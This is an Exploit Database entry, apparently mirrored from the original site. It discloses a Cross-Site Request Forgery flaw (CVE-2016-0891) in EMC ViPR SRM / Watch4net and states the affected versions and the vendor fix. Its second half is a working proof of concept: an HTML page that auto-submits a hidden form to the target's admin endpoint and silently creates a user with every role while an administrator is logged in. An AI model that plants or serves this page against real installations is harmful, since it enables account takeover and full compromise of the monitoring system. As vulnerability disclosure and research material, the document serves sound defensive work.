EMC ViPR SRM – Cross-Site Request Forgery

• Exploit Database
• 24 阅读

• 作者： Han Sahin
  日期： 2016-04-27
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/39738/

• <!--
  EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection
  
  Abstract
  
  It was discovered that EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.
  
  Affected versions
  
  Versions of EMC ViPR SRM prior to version 3.7 are affected by these vulnerabilities.
  
  See also
  
  - ESA-2016-039
  - CVE-2016-0891
  
  Fix
  
  EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please note that this fix is only available for registered EMC Online Support customers.
  
  Introduction
  
  EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard. EMC M&R is a core embedded software technology existing in EMC ViPR, ViPR SRM and Service Assurance Suite.
  
  EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.
  
  Details
  
  Cross-Site Request Forgery (CSRF) is an attack, which forces an end user to execute unwanted actions on a web application to which the targeted user is currently authenticated. With a little help of social engineering an attacker may trick the users of a web application into executing actions (requests) of the attacker's choosing.
  
  The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account.
  -->
  
  <html>
   <body>
  <form action="http://<target>:58080/APG/admin/form" method="POST">
   <input type="hidden" name="form&#45;id" value="UserForm" />
   <input type="hidden" name="ident" value="" />
   <input type="hidden" name="old" value="" />
   <input type="hidden" name="name" value="CSRF" />
   <input type="hidden" name="password" value="1" />
   <input type="hidden" name="confirm" value="1" />
   <input type="hidden" name="title" value="" />
   <input type="hidden" name="first&#45;name" value="Han" />
   <input type="hidden" name="last&#45;name" value="Sahin" />
   <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
   <input type="hidden" name="role" value="user" />
   <input type="hidden" name="profile" value="0" />
   <input type="hidden" name="user&#45;roles" value="5" />
   <input type="hidden" name="user&#45;roles" value="1" />
   <input type="hidden" name="user&#45;roles" value="3" />
   <input type="hidden" name="user&#45;roles" value="4" />
   <input type="hidden" name="user&#45;roles" value="2" />
   <input type="hidden" name="user&#45;roles" value="6" />
   <input type="hidden" name="filter" value="" />
   <input type="hidden" name="custom" value="true" />
   <input type="submit" value="Submit request" />
  </form>
  <script>
   document.forms[0].submit();
  </script>
   </body>
  </html>